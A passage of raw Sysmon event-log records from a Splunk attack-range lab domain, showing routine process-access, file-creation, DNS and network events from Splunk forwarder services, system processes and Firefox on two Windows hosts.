23542300x800000000000000082884Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.640{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7338E331C58CA3214D1F11303EBE28F,SHA256=E08F96FF3E737DC21AB3FE39F67AC2CCBF998B478D4A9BD1E446D85934306385,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082883Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.500{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B42C-615A-7F01-00000000FD01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082882Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.500{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082881Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.500{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082880Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.500{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082879Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.500{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082878Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.500{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082877Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.500{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082876Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.500{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082875Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.500{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082874Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.500{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082873Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.500{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B42C-615A-7F01-00000000FD01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082872Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.500{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B42C-615A-7F01-00000000FD01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082871Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.500{2FDD8D40-B42C-615A-7F01-00000000FD01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082870Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:36.406{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EDF6397260C3E14EA1481E4FB0DD428,SHA256=4FF4B4A6DFA23AEA6AC7E3A9BE247FA5025F24AAA8DCD5DB7476ACB6435AE2DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105724Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:36.170{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local65183- 354300x8000000000000000105723Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:36.170{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61135- 354300x8000000000000000105722Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:35.398{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62439- 354300x8000000000000000105721Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:35.396{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59379- 23542300x8000000000000000105720Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:36.835{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8C989962B1EF66D685C04A21B0A9F12,SHA256=9E76B1CA61F6224878B316AE54D39D67287994A582A8940C138F12F62D109537,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082887Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:34.643{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50123-false10.0.1.12-8000- 23542300x800000000000000082886Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:37.500{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6336225DC0FD18F0949E626C8E0491CA,SHA256=D86C3D3BF81394E9F83CCB8C7D4561C7DDB2523882C6DA3DE34858EB44E204BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105729Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:37.962{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0 23542300x8000000000000000105728Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:37.955{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\formhistory.sqlite-journalMD5=D51EB2824F776919146DBC7B69E40E33,SHA256=48352A090B561F7D512EF9FB304487F316732DEA8025108168B13BA672196D94,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105727Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:36.195{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61135- 354300x8000000000000000105726Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:36.170{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51658- 23542300x8000000000000000105725Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:37.850{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4606ACBE60477BB4257AB8210377DC0,SHA256=46E1988F2EC73D917E20FB09F1B1BF7A5BBEE2D346E8FB6F50D8B44AA949CB31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082888Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:38.578{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75354BC55D4085FED194680120E84154,SHA256=E9652FBBA5B698DC043E29ACBAC3456D53B01F0FEA7A198784119A8ADA65A003,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105754Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.162{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51789-false142.250.184.196fra24s11-in-f4.1e100.net443https 10341000x8000000000000000105753Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.915{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+27cf1b8|C:\Program Files\Mozilla Firefox\xul.dll+27c04fc|C:\Program Files\Mozilla Firefox\xul.dll+c07a31|C:\Program Files\Mozilla Firefox\xul.dll+27b74bd|C:\Program Files\Mozilla Firefox\xul.dll+c0ed76|C:\Program Files\Mozilla Firefox\xul.dll+c07efb|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+27b872e|C:\Program Files\Mozilla Firefox\xul.dll+27b84c4|C:\Program Files\Mozilla Firefox\xul.dll+c0ffd2|C:\Program Files\Mozilla Firefox\xul.dll+c09d79 23542300x8000000000000000105752Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.910{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=406EBF05C822D92DCF85984A7EF3AE14,SHA256=BD8D8D7625EECEDC5FD86C1B43950213367EACAECCB7952209D2ACF2AA1BF908,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105751Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.811{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b66218|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105750Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.801{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+27cf1b8|C:\Program Files\Mozilla Firefox\xul.dll+27c04fc|C:\Program Files\Mozilla Firefox\xul.dll+c07a31|C:\Program Files\Mozilla Firefox\xul.dll+27b74bd|C:\Program Files\Mozilla Firefox\xul.dll+c0ed76|C:\Program Files\Mozilla Firefox\xul.dll+c07efb|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+27b872e|C:\Program Files\Mozilla Firefox\xul.dll+27b84c4|C:\Program Files\Mozilla Firefox\xul.dll+c0ffd2|C:\Program Files\Mozilla Firefox\xul.dll+c09d79 10341000x8000000000000000105749Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.801{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla 